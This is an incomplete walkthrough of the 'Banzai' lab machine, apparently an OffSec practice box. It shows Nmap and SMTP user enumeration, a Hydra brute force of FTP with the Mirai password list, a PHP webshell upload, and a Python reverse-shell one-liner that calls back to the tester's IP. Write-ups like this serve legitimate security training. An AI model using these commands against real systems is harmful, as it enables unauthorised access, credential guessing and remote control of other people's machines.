Banzai (WIP)
Nmap
sudo nmap 192.168.233.56 -p- -sS -sV
PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
25/tcp open smtp Postfix smtpd
5432/tcp open postgresql PostgreSQL DB 9.6.4 - 9.6.6 or 9.6.13 - 9.6.17
8080/tcp open http Apache httpd 2.4.25
8295/tcp open http Apache httpd 2.4.25 ((Debian))
Service Info: Hosts: banzai.offseclabs.com, 127.0.1.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelSMTP is open on the host. Bruteforcing smtp-user-enum reveals the following:
sudo perl smtp-user-enum.pl -M VRFY -U /usr/share/seclists/Usernames/Names/names.txt -t 192.168.233.56
The user admin is not a default user on Linux / Unix systems. We can attempt to bruteforce this against relevant services starting with FTP.
We receive no hits with Hydra after 30 minutes.
However, trying with the mirai password list provides success on admin:admin.
hydra -l admin -P /usr/share/wordlists/metasploit/mirai_pass.txt ftp://192.168.233.56 
Logging in with FTP appears to show the root directory for the webserver. Knowing this we can upload a reverse shell. A PHP shell will be sufficiant as we can tell from the listing PHP is supported.
Using the PUT command we can upload a webshell then browse to it to access: http://192.168.233.56:8295/webshell.php
A Python reverse shell was then executed on the webshell pointing back to a listener on port 21 to gain a full shell.
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.233",21));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")'
Last updated